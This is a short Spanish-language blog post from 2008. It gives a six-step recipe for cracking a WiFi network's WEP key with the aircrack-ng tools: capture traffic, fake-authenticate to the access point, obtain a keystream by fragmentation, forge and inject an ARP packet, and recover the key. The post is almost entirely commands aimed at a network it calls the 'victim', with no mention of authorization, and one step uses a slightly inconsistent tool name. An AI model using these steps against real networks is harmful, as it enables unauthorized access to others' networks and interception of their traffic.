jueves, 12 de junio de 2008

Las WiFi con WEP

Una vez logrado que la suite de aircrack-ng funcione, los pasos basicos seria:

1) Hacer el volcado especificando BSSID, canal y archivo de captura:

sudo airodump-ng --bssid (MAC victima) --channel (canal victima) -w victima.cap ath0

2) Lograr un fakeauth con el AP:

sudo aireplay-ng -1 6000 -e (SSID victima) -a (BSSID victima) ath0

Si esto funciona OK, deberia darnos algo como ;-)

3) Obtener un ARP_REQ falso:

sudo aireplay-ng -5 -b (BSSID victima) -h (MAC autenticada) ath0

Cuando pregunta por utilizar determinado paquete contestar yes y si todo sale bien, deberia generar un archivo con extension .XOR

4) Forjar un paquete para injectarlo posteriormente:

sudo packetforge-ng -0 -a (BSSID victima) -h (MAC autenticada) -k 255.255.255.255 -l 255.255.255.255 -y frag*.xor -w vacuna

5) Injectar el paquete para generar trafico:

sudo aireplay -2 -r vacuna ath0

6) Obtener WEP:

sudo aircrack-ng victima.cap

No hay comentarios:

Publicar un comentario